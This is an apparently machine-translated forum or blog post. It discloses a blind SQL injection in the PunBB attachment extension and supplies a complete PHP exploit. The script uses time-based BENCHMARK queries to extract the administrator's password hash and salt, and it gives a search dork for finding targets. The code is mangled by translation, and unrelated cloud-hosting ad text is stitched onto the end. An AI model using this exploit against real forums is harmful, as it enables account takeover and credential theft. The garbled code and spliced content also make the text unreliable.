By Ryat
Http://www.wolvez.org
I wanted to add an attachment upload function to the forum. I posted a pun_attachment from the official website. By the way, I checked the code and found this vulnerability: p
If (isset ($ _ GET [secure_str])
{
If (preg_match (~ (D +) f (d + )~, $ _ GET [secure_str], $ match ))
{
...
WHERE => a. id =. $ attach_item. AND (fp. read_forum is null or fp. read_forum = 1) AND secure_str =. $ _ GET [secure_str].
Obviously, the misuse of regular expressions and the preg_match function can trigger SQL inj through $ _ GET [secure_str...
In addition, there is an injection in the pun_list_attach.php file, but the background permission is required. If you are interested, you can see it more clearly :)
Finally, let's give a PoC EXP. Don't ask me about the specific effect and utilization...
#! /Usr/bin/php
<? Php
Print_r (
+ --------------------------------------------------------------------------- +
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
By puret_t
Mail: puretot at gmail dot com
Team: http://www.wolvez.org
Dork: "Powered by PunBB"
+ --------------------------------------------------------------------------- +
);
/**
* Works regardless of php. ini settings
*/
If ($ argc <3 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. host path
Host: target server (ip/hostname)
Path: path to punbb
Example:
Php. $ argv [0]. localhost/punbb/
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Pre = pun _;
$ Benchmark = 200000000;
$ Timeout = 10;
Echo "Plz Waiting... Password :";
/**
* Get pass
*/
$ J = 1;
$ Pass =;
$ Hash [0] = 0; // null
$ Hash = array_merge ($ hash, range (48, 57); // numbers
$ Hash = array_merge ($ hash, range (97,122); // a-z letters
While (strlen ($ pass) <40 ){
For ($ I = 0; $ I <= 255; $ I ++ ){
If (in_array ($ I, $ hash )){
$ Cmd = 1f1% 27% 20AND % 20 (IF (ASCII (SUBSTRING (SELECT % 20 password % 20 FROM % 20. $ pre. users % 20 WHERE % 20group_id = 1% 20 LIMIT % 201 ),. $ j ., 1) =. $ I .), BENCHMARK (. $ benchmark ., CHAR (0), 1) % 23;
Send ();
Usleep (2000000 );
$ Starttime = time ();
Send ();
$ Endtime = time ();
$ Difftime = $ endtime-$ starttime;
If ($ difftime> $ timeout ){
$ Pass. = chr ($ I );
Echo chr ($ I );
Break;
}
}
If ($ I = 255)
Exit ("Exploit Failed! ");
}
$ J ++;
}
Echo "Salt :";
/**
* Get salt
*/
$ J = 1;
$ Salt =;
$ Hash [0] = 0; // null
$ Hash = array_merge ($ hash, range (33,126 ));
While (strlen ($ salt) <12 ){
For ($ I = 0; $ I <= 255; $ I ++ ){
If (in_array ($ I, $ hash )){
$ Cmd = 1f1% 27% 20AND % 20 (IF (ASCII (SUBSTRING (SELECT % 20 salt % 20 FROM % 20. $ pre. users % 20 WHERE % 20group_id = 1% 20 LIMIT % 201 ),. $ j ., 1) =. $ I .), BENCHMARK (. $ benchmark ., CHAR (0), 1) % 23;
Send ();
Usleep (2000000 );
$ Starttime = time ();
Send ();
$ Endtime = time ();
$ Difftime = $ endtime-$ starttime;
If ($ difftime> $ timeout ){
$ Salt. = chr ($ I );
Echo chr ($ I );
Break;
}
}
If ($ I = 255)
Exit ("Exploit Failed! ");
}
$ J ++;
}
Exit ("Expoilt Success! Password Hash: $ passSalt: $ salt ");
Function send ()
{
Global $ host, $ path, $ cmd;
$ Data = "GET". $ path. "misc. php? Item = 1 & secure_str = ". $ cmd." HTTP/1.1 ";
$ Data. = "Host: $ host ";
$ Data. = "Connection: Close ";
$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ data );
$ Resp =;
While ($ fp &&! Feof ($ fp ))
$ Resp. = fread ($ fp, 1024 );
Return $ resp;
}
?>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
